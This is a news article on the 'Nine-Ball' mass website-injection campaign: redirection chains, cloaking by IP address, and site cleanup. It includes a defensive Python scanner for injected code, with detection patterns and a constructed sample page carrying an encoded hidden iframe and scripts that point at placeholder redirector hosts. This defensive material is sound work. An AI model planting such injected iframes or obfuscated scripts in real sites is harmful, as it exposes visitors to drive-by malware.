
"Nine-Ball" mass injection attack compromised 40,000 sites


A new threat dubbed “Nine-Ball” has compromised up to 40,000 legitimate websites, which are, in turn, infecting users with an information-stealing Trojan, according to security vendor Websense.

The attack is called “Nine-Ball” because of the name of the final malicious landing page, which is loaded with drive-by exploits and to which unsuspecting visitors of a compromised site are automatically redirected. That exploit site, ninetoraq, contains malicious code that looks for already patched vulnerabilities in Acrobat Reader, QuickTime, Microsoft Data Access Components (MDAC) and AOL SuperBuddy, which it then attempts to exploit, Stephan Chenette, manager of security research at Websense, said on Wednesday.

The flaws have all been patched; some date back to 2006, Chenette said. But the Reader and QuickTime vulnerabilities are newer, making it less likely that users have applied those patches. If the malicious code finds an unpatched vulnerability to exploit, it drops either a malicious PDF file or a Trojan designed to steal user information, Chenette said.

All of the exploits currently have low detection rates, he added.

The 40,000 legitimate but compromised websites were “sleeping” up until Monday, Chenette said. Before then, a user who visited one of them was redirected to a benign site. On Monday, though, the attack was updated and users started being redirected to the malicious ninetoraq site.

Currently, users who visit one of the compromised sites are first sent through a chain of redirections before landing on the final exploit site, ninetoraq. Users simply see the normal content of the infected page; the redirections occur in the background without their knowledge, so a user would not notice being on the ninetoraq site. Sending users through numerous redirections makes the job of tracking the attackers more difficult, Chenette said.

During the redirections, the visitor's IP address is recorded. If the IP address is new, the user is directed to the exploit payload site. But if the IP address has already been recorded, the user is sent from the compromised site to the benign site instead, a redirection the user does see, Chenette said.

Attackers may have included this feature to evade security companies probing the infected sites to analyze the attack: an analyst who is directed to the benign site might assume the attack no longer works.

Websense researchers determined that the compromised sites do not run a common piece of software, which means the malicious code was injected using previously stolen credentials rather than by exploiting a flaw in shared software.

Getting rid of the problem requires multiple steps, Chenette said. Website owners must look through their site's source code for obfuscated or scrambled code and remove it. Then they need to change the credentials of all accounts that can access the website.
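Neither Websense nor the article supplies a cleanup tool; the following is an added example (not the vendor's code) of the first step Chenette describes, reviewing a site's source for obfuscated or scrambled code, and of the redirection artifacts described above. It reads the site's own files from disk rather than fetching live pages, because an IP address that has already been seen is served the benign redirect and a second fetch would show nothing. All host names and both sample pages are constructed placeholders, not material captured from the campaign.

```python
"""Heuristic review of a site's source files for injected, obfuscated code.

Added example, not Websense's or any vendor's tooling. It flags the
artifacts mass-injection campaigns typically leave in page source:
hidden iframes, eval/unescape/document.write wrappers, long
percent- or hex-encoded blobs (which it decodes and re-checks), and
<script src> tags that load from a host other than the site's own.
All host names below are placeholders.
"""
import os
import re
import sys
from dataclasses import dataclass
from urllib.parse import unquote, urlparse


@dataclass
class Finding:
    rule: str
    line: int
    snippet: str
    decoded: str = ""


IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# width/height of 0 or 1, or CSS that hides the frame
HIDDEN_ATTR_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?\s*[01]\b|visibility\s*:\s*hidden|display\s*:\s*none""", re.I)
OBFUSCATION_RE = re.compile(
    r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\s*\(", re.I)
PERCENT_BLOB_RE = re.compile(r"(?:%[0-9a-fA-F]{2}){16,}")
HEX_BLOB_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){16,}")
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.I)


def _hidden_iframes(text, lineno, rule, findings):
    for m in IFRAME_RE.finditer(text):
        if HIDDEN_ATTR_RE.search(m.group(0)):
            findings.append(Finding(rule, lineno, m.group(0)))


def scan_html(text, own_host):
    """Return a list of Finding objects for suspicious constructs in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        _hidden_iframes(line, lineno, "hidden_iframe", findings)
        for m in OBFUSCATION_RE.finditer(line):
            findings.append(Finding("obfuscation_call", lineno, m.group(0)))
        # Decode encoded blobs and look again: the payload is usually a
        # hidden iframe or script pointing at the first redirector.
        for rule, rx, decode in (
            ("percent_encoded_blob", PERCENT_BLOB_RE, unquote),
            ("hex_encoded_blob", HEX_BLOB_RE,
             lambda s: s.encode("ascii").decode("unicode_escape")),
        ):
            for m in rx.finditer(line):
                decoded = decode(m.group(0))
                findings.append(Finding(rule, lineno, m.group(0)[:32] + "...", decoded))
                _hidden_iframes(decoded, lineno, "hidden_iframe_decoded", findings)
        for m in SCRIPT_SRC_RE.finditer(line):
            host = urlparse(m.group(1)).hostname
            if host and host.lower() != own_host.lower():
                findings.append(Finding("external_script", lineno, m.group(1)))
    return findings


def scan_tree(root, own_host, exts=(".html", ".htm", ".php", ".js")):
    """Walk a site's document root and scan every file with a web extension."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_html(fh.read(), own_host)
                if hits:
                    report[path] = hits
    return report


# Constructed sample pages (placeholder hosts), not captured from the campaign.
_PAYLOAD = '<iframe src="http://hop1.example/in.cgi?3" width=1 height=1></iframe>'
_ESCAPED = "".join("%%%02x" % b for b in _PAYLOAD.encode("ascii"))
INJECTED_PAGE = f"""<html><head><title>Shop</title>
<script src="/static/app.js"></script>
</head><body><h1>Welcome</h1>
<script>document.write(unescape("{_ESCAPED}"));</script>
<iframe src="http://hop2.example/x.php" style="visibility:hidden" width="1" height="1"></iframe>
<script src="http://stats.hop3.example/c.js"></script>
</body></html>"""
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="/static/app.js"></script>
</head><body><h1>Welcome</h1>
<iframe src="https://shop.example/help" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    own = sys.argv[2] if len(sys.argv) > 2 else "shop.example"
    pages = {"<sample>": INJECTED_PAGE} if len(sys.argv) < 2 else None
    report = scan_tree(sys.argv[1], own) if pages is None else {k: scan_html(v, own) for k, v in pages.items()}
    for path, hits in report.items():
        for h in hits:
            print(f"{path}:{h.line}: {h.rule}: {h.snippet}" + (f" -> {h.decoded}" if h.decoded else ""))
```

Run it with no arguments to see the findings on the constructed sample, or as `python scan.py /var/www/html shop.example` to walk a real document root. The decoded blob is reported alongside the raw one so that a reviewer can see the hidden iframe the unescape wrapper was concealing; any external script host or decoded redirector it prints is the first hop of the redirection chain and belongs in the credential-rotation and cleanup that follows.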

Chenette said that none of the 40,000 infected sites for this particular attack are well-known brands.

“Attackers are going after quantity and not quality,” Chenette said. “If they go after big name websites, they are shut down faster.”

Over the past several months there have been similar mass-injection attack waves every few weeks, Neil Daswani, co-founder of web anti-malware vendor Dasient, said on Wednesday.

A similar threat, called Gumblar, made headlines recently for compromising approximately 60,000 legitimate websites. In addition, another mass-injection attack, Beladen, was said to have infected 40,000 websites.

Daswani said that in the past two years there has been a 600 percent increase in the number of trusted websites being used as malware distribution points. Compromised websites face a number of consequences, including being blacklisted by search engines, which typically causes a significant drop in traffic.

“Once they clean up, the challenge is to try and get back traffic,” Daswani said. “From businesses we have spoken to, once they clean up, it's very hard to get back to [the former] traffic level because there's a loss of consumer confidence.”
